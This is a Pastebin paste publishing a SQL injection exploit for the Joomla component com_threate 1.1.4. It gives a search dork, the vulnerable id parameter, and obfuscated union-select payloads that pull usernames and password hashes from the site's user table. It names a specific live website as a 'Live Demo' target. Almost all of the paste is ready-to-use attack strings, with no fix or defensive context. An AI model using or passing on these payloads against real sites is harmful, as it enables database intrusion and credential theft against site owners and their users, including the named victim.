API tools faq
paste
Advertisement
xBADGIRL21

Joomla com_threate 1.1.4 SQL injection

xBADGIRL21
Jul 10th, 2016
116
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.14 KB | None | 0 0
raw download clone embed print report
  1. ######################
  2. # Exploit Title : Joomla com_threate 1.1.4 SQL injection
  3. # Exploit Author : xBADGIRL21
  4. # Dork : index.php?option=com_threate
  5. # version: 1.1.4
  6. # Vendor Homepage : http://joomlic.com/
  7. # Tested on: [ Windows ]
  8. # skype:xbadgirl21
  9. # Date: 2016/07/09
  10. # video Proof : https://youtu.be/WXqrK7dqGaY
  11. ######################
  12. # PoC:
  13. # [id=] Get Parameter Vulnerable To SQL
  14. #
  15. # http://server/index.php?option=com_theatre&view=show&id=[SQLi]
  16. #
  17. # Demo
  18. # http://server/index.php?option=com_theatre&view=show&id=36'
  19. #
  20. # http://server/index.php?option=com_theatre&view=show&id=-36 /*!12345union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
  21. #
  22. # http://server/index.php?option=com_theatre&view=show&id=-36 /*!12345union*/ select 1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 from aur_users--
  23. #
  24. # Live Demo :
  25. # https://www.auroratheatre.org/
  26. #
  27. ######################
  28. # Discovered by : xBADGIRL21
  29. # Greetz : All Mauritanien Hackers -
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!